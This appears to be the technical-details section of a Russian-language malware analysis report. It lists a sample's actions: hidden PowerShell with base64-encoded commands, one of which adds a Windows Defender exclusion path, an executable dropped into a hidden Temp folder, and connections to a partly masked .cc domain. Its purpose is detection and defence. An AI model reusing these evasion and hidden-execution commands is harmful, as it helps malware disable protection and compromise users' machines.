Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -enc IwAgAEcAZQByAGEAIABwAGEAcwB0AGEAIABhAGwAZQBhAHQA8wByAGkAYQAgAGUAIABuAG8AbQBlACAAYQBsAGUAYQB0APMAcgBpAG8AIABwAHIAbwAgAEUAWABFAA0ACgAkAGYAbwBsAGQAZQByACAAPQAgACIAJABlAG4A...
- %TEMP%\c61e7b99-5b02-4c09-ae4d-ab1e207d7d6c\bfd0jjjuhdq.exe
- 'bn###ntepiou.cc':443
- 'bn###ntepiou.cc':443
- DNS ASK bn###ntepiou.cc
- '<SYSTEM32>\attrib.exe' +h %TEMP%\c61e7b99-5b02-4c09-ae4d-ab1e207d7d6c
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAY... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -enc IwAgAEcAZQByAGEAIABwAGEAcwB0AGEAIABhAGwAZQBhAHQA8wByAGkAYQAgAGUAIABuAG8AbQBlACAAYQBsAGUAYQB0APMAcgBpAG8AIABwAHIAbwAgAEUAWABFAA0ACgAkAGYAbwBsAGQAZQByACAAPQAgACIAJABlAG4A... (со скрытым окном)